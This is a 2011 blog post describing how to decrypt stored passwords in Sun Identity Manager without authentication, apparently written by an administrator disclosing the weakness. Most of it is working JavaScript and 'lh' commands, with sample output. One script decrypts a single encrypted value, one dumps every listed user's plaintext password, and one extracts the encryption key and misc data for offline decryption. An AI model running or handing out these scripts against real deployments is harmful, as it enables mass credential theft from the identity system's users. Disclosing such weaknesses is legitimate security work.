Extracting encrypted passwords from Sun Identity Manager

, posted: 2-Nov-2011 20:25

For my sins I am using Sun IDM.  And I was somewhat disappointed at how easy it is to extract any password from Sun IDM without needing any authentication.  As long as you have comand line access to call the LH you can extract the configurator password.  Here are a few links I found on this topic.

http://www.darkedges.com/blog/?p=7
http://zerointechnologies.com/sun-idm-decrypt-password.html

The second link includes the javascript code needed, but a session needs to be established first.  So this is the modified code I used.

/* Decrypt Sun IDM Passwords */
importPackage(Packages.com.waveset.util);
importPackage(Packages.com.waveset.server);
var _lhSession = new InternalSession();
print("Encrypted = " + arguments[0]);
var pwd = new EncryptedData();
pwd.fromString(arguments[0]);
print("Decrypted = " + pwd.decryptToString());
/* End */

Then have the above script called pwd.js.  Calling it as shown below:

./lh js pwd.js "3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw=="
Encrypted = 3A961D0D453E218C:6BCF235D:122ED7C4BB6:-7FA4|GsggQAq2YSSbb1sZE9Xaxw==
Decrypted = configurator


So... to get the encrypted password you want, a modified version of the JS to take an input file and return the passwords:

/* Decrypt Sun IDM Passwords */
importPackage(Packages.java.util);
importPackage(Packages.java.io);
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
importPackage(Packages.com.waveset.util);
var _lhSession = new InternalSession();
var file = new FileReader(arguments[0]);
var br = new BufferedReader(file);
var line;
while ((line = br.readLine()) != null) {
var obj = _lhSession.getObject(Type.USER, line);
var pwd = new EncryptedData();
pwd.fromString(obj.getAttribute("password"));
print(obj.getName() + "," + pwd.decryptToString());
}
/* End */

Plus i've now got the offline decryption working too by extracting out the encryption key:

$WSHOME/bin/lh console -c "getObject EncryptionKey *"

And the Misc data:

/* Extract Misc Data */
importPackage(Packages.com.waveset.object);
importPackage(Packages.com.waveset.session);
var _lhSession = new InternalSession();
var obj = _lhSession.getObject(Type.MISCELLANEOUS, "miscData");
print("Result" + obj.toXml());
/* End */

Then call the javascript:

$WSHOME/bin/lh js misc.js

Using the code shown above from Dark Edges.

Sad.. But true.








BarTender's profile

Bar Tender
Wellington
New Zealand